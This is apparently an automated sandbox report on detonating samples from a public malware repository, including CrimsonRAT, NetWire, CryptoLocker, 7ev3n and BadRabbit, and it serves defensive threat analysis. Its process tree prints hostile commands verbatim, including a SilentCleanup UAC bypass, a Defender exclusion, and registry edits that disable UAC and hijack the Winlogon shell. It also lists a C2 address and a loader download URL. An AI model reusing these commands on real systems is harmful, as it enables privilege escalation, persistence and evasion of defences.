Analysis
-
max time kernel
415s -
max time network
422s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
-
submitted
29-07-2024 10:03
General
-
Target
https://github.com/Da2dalus/The-MALWARE-Repo/tree/master/Ransomware
Malware Config
Extracted
crimsonrat
185.136.161.124
Extracted
modiloader
https://drive.google.com/u/0/uc?id=1TcSctGVBajYMA7CFDc158wpvqkpxmkhJ&export=download
Signatures
-
CrimsonRAT main payload 1 IoCs
-
CrimsonRat
Crimson RAT is a malware linked to a Pakistani-linked threat actor.
-
CryptoLocker
Ransomware family with multiple variants.
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Netwire
Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.
-
ModiLoader First Stage 1 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 4 IoCs
-
Loads dropped DLL 1 IoCs
-
Abuse Elevation Control Mechanism: Bypass User Account Control 1 TTPs 1 IoCs
UAC Bypass Attempt via SilentCleanup Task.
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 19 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies registry class 3 IoCs
-
Modifies registry key 1 TTPs 3 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 24 IoCs
-
Suspicious use of SetWindowsHookEx 15 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Da2dalus/The-MALWARE-Repo/tree/master/Ransomware1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe0d6b46f8,0x7ffe0d6b4708,0x7ffe0d6b47182⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,18162915131058696081,721391577608735327,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2056 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2040,18162915131058696081,721391577608735327,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2040,18162915131058696081,721391577608735327,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2712 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,18162915131058696081,721391577608735327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,18162915131058696081,721391577608735327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2040,18162915131058696081,721391577608735327,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5248 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2040,18162915131058696081,721391577608735327,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5896 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2040,18162915131058696081,721391577608735327,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5896 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,18162915131058696081,721391577608735327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4812 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,18162915131058696081,721391577608735327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5988 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,18162915131058696081,721391577608735327,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2340 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,18162915131058696081,721391577608735327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,18162915131058696081,721391577608735327,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2040,18162915131058696081,721391577608735327,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5412 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,18162915131058696081,721391577608735327,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2684 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\RAT\CrimsonRAT.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\RAT\CrimsonRAT.exe"1⤵
-
C:\ProgramData\Hdlharas\dlrarhsiva.exe"C:\ProgramData\Hdlharas\dlrarhsiva.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\RAT\NetWire.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\RAT\NetWire.exe"1⤵
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\RAT\NetWire.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\RAT\NetWire.exe"2⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\Notepad.exeC:\Windows\System32\Notepad.exe3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Natso.bat" "4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg delete hkcu\Environment /v windir /f5⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
-
-
C:\Windows\SysWOW64\reg.exereg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "5⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I5⤵
- Abuse Elevation Control Mechanism: Bypass User Account Control
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exereg delete hkcu\Environment /v windir /f5⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Runex.bat" "4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows \System32\fodhelper.exe"C:\Windows \System32\fodhelper.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Public\x.bat6⤵
-
C:\Windows\system32\cmd.execmd /c C:\Users\Public\x.vbs7⤵
- Checks computer location settings
- Modifies registry class
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\x.vbs"8⤵
- Checks computer location settings
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\cde.bat" "9⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
-
-
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"3⤵
-
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x320 0x2f01⤵
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Joke\rickroll.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Joke\rickroll.exe"1⤵
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Joke\rickroll.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Joke\rickroll.exe"1⤵
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Joke\rickroll.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Joke\rickroll.exe"1⤵
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Joke\rickroll.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Joke\rickroll.exe"1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Joke\YouAreAnIdiot\EXEVersion\AxInterop.ShockwaveFlashObjects.dll"2⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Joke\YouAreAnIdiot\EXEVersion\YouAreAnIdiot.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Joke\YouAreAnIdiot\EXEVersion\YouAreAnIdiot.exe"1⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6944 -s 15522⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 6944 -ip 69441⤵
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Joke\YouAreAnIdiot\EXEVersion\YouAreAnIdiot.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Joke\YouAreAnIdiot\EXEVersion\YouAreAnIdiot.exe"1⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 15242⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4312 -ip 43121⤵
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Joke\YouAreAnIdiot\EXEVersion\YouAreAnIdiot.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Joke\YouAreAnIdiot\EXEVersion\YouAreAnIdiot.exe"1⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 60 -s 15242⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 60 -ip 601⤵
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\CoronaVirus.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\CoronaVirus.exe"1⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"2⤵
-
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\CryptoLocker.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\CryptoLocker.exe"1⤵
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe"C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe" "/rC:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\CryptoLocker.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe"C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe" /w0000021C3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\DeriaLock.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\DeriaLock.exe"1⤵
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\7ev3n.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\7ev3n.exe"1⤵
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\system.exe"C:\Users\Admin\AppData\Local\system.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat3⤵
-
-
C:\Windows\SysWOW64\SCHTASKS.exeC:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:643⤵
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:643⤵
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:643⤵
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:643⤵
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:643⤵
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:643⤵
-
-
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\$uckyLocker.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\$uckyLocker.exe"1⤵
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\Annabelle.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\Annabelle.exe"1⤵
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\BadRabbit.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\BadRabbit.exe"1⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 152⤵
-
C:\Windows\SysWOW64\cmd.exe/c schtasks /Delete /F /TN rhaegal3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Delete /F /TN rhaegal4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe/c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3137953758 && exit"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3137953758 && exit"4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.exe/c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 10:28:003⤵
-
-
C:\Windows\72C2.tmp"C:\Windows\72C2.tmp" \\.\pipe\{4E541D14-B7DD-436D-9940-C6CC305C8C54}3⤵
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.9MB
MD5120585061ab2ef20ba7214cfb95e5f87
SHA1c7891eee6c63a0a1dde616856436dbb784ab874e
SHA256e5cc141224f94ab7c9355119d16d0a03b1c94a2d0e3f19c4ab449503482835bb
SHA51240b51965f5a98e34b53d9bdeee4ddefe67e7c137f888fbf98ceb8e3baa524b31ee84208440ac4f15817cb0a8041d6f4529c7aba90b2d83224770c11c5bc1ed17
-
Filesize
9.1MB
MD564261d5f3b07671f15b7f10f2f78da3f
SHA1d4f978177394024bb4d0e5b6b972a5f72f830181
SHA25687f51b4632c5fbc351a59a234dfefef506d807f2c173aac23162b85d0d73c2ad
SHA5123a9ff39e6bc7585b0b03f7327652e4c3b766563e8b183c25b6497e30956945add5684f1579862117e44c6bac2802601fc7c4d2a0daa1824f16c4da1fd6c9c91a
-
Filesize
56KB
MD5b635f6f767e485c7e17833411d567712
SHA15a9cbdca7794aae308c44edfa7a1ff5b155e4aa8
SHA2566838286fb88e9e4e68882601a13fa770f1b510a0a86389b6a29070a129bf2e5e
SHA512551ba05bd44e66685f359802b35a8c9775792a12844906b4b53e1a000d56624c6db323754331c9f399072790991c1b256d9114a50fb78111652a1c973d2880af
-
Filesize
12KB
MD56b53b9369b3b06083c65d8bb34a3613b
SHA15de90bba21ce682d541fcb27ef558ca8a01cc379
SHA256870d690005229e6f74c5c291ee2ad8da4eeaf2c0d939e4c6f22e54472296a357
SHA5128bd72d29bb95f51b870c913d546f9f45ed634e271758ed6be03bd4ba34b6d482c7d2c6acc7138813b3d265e55675d1df6d81fb111d3e0821bec75e09933fd46a
-
Filesize
152B
MD5d406f3135e11b0a0829109c1090a41dc
SHA1810f00e803c17274f9af074fc6c47849ad6e873e
SHA25691f57909a10174b06c862089a9c1f3b3aeafea74a70ee1942ce11bb80d9eace4
SHA5122b9f0f94b1e8a1b62ab38af8df2add0ec9e4c6dfa94d9c84cc24fe86d2d57d4fc0d9ec8a9775cf42a859ddfd130260128185a0e2588992bca8fd4ebf5ee6d409
-
Filesize
152B
MD57f37f119665df6beaa925337bbff0e84
SHA1c2601d11f8aa77e12ab3508479cbf20c27cbd865
SHA2561073dbff3ec315ac85361c35c8ba791cc4198149b097c7b287dda1d791925027
SHA5128e180e41dd27c51e81788564b19b8ff411028890da506fbf767d394b1e73ec53e046c8d07235b2ec7c1c593c976bbf74ed9b7d442d68b526a0a77a9b5b0ab817
-
Filesize
2KB
MD528d9cc940914cd2b5ccfc9e3ecb3ce28
SHA1978b996fd22c4a14fb2cd18ab53318037cd15f76
SHA256fc90b3ed945acc32f16539a6ff2f6f2a3c0c52e109c24a1fef5e3f31d6fe1562
SHA512707c9601ed1fee3317a69f3c1f1fb6469763be61c5af92b12ab4bff14c1871bdd78c85a8e73ce129eea69264e33daf1505a64ecfc2c14d9985610eed4fb9bc76
-
Filesize
573B
MD572d8b549c047805a5315df059bb1539a
SHA13df3770c14379441be3be79eac28f5a1344cdada
SHA256beb758c4229b5c555242bde07bb5e88edd0d43be725dd68c8a4f33e6eddf10f6
SHA5120bee533bd41e2226f9e971c9e4b75dee9d8d8ea545bc8a119d3a3c31bbea9f4c30b0ae3dcb58cfeca103ec4880171d2d63c676ac7a4a71b990e4a5ad376fe4fb
-
Filesize
111B
MD5285252a2f6327d41eab203dc2f402c67
SHA1acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA2565dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA51211ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d
-
Filesize
5KB
MD5fafaa9897152b82e86ac45f58dafd7fc
SHA1ee6826b28d9bd59a34e6d5f6ac8b4464a14fd7d4
SHA2566b7c8d628942ab5fa7f85e9d3839ba360bfa3f3eba95a9651ab1419f6dba1587
SHA512d29ed3e9177569097c56446468d68a3ddda1bbed20c2956466614c34c41ad00518a44d6f6a37ff22e3f4f5c20a846fbb8e96a2d47aa68f915f1e71168533355f
-
Filesize
6KB
MD5d1373464ad5c1ca3864ca8cfccc791b6
SHA13cfb4c04e7596c535b6b40246c6c930eb16e98c2
SHA25608a3cc1aeb30be09a59d24633fc9cf2fd8564cdabc48c8035bf3467a26cd6898
SHA512c67613e103b4bb937f87967c6e043162829895c560ba01d487e645c5e6297b6ca8848718d7de805ba2c71f5c489d4f267c70520eb9157b7d2d863d6cbdb850c5
-
Filesize
6KB
MD5ea5416881ab0a798f2bca2d6e99e7f7e
SHA15720d23a1052ff7ba6710d0d0a262156c9ae8e0a
SHA2562119bae71abd4c2a77fbf953cf9b6b74f38bf0b6ab90ab474ba93b5dcbc0996e
SHA51216ac1ff8cd80c31a2cdaf05f13f35af94f97118e2ab30f4dd769c855142ecc77948646d7f1823ef61851df3eb54825b221eec57e0f42b2842f4c3d67046ff6ed
-
Filesize
6KB
MD566eebe31f47098d09e9c9f63b915b09c
SHA1f888048fb35772ea43a0bbac3e17753371949b03
SHA256d18b59419ddb305c5f4b9a2e5d9244490c753f135274930cb18d13c28c19ffa4
SHA512e88e988a750e3755a9a64e53e5953394052ae113d4da2efe57eebafeb32cc5155d1d823ef935ad490710f2b24f22ea9787f0164149973d8bf1feffca99fa1b05
-
Filesize
1KB
MD50968d17613189bbc85be8f1e555559de
SHA18af8ce28251266e98eb8f199a8dd5abd2b0b5d22
SHA2560531b43d858237037c2994fc4bf53769e0408a6b250b0324602cf57120ce731a
SHA51216bca35070d80bab0d2b87ec51c220b7c8cd7ab06b118c3e2efc412e2812c987dba63c60ac5d30dd6ce518918989f8415e64efddff89efe2abcfd139f2c0f223
-
Filesize
874B
MD5faac447d616580ab7a88f5ae04ca962d
SHA1ff8100cd3dea7269216de943ce5fad47077d7d64
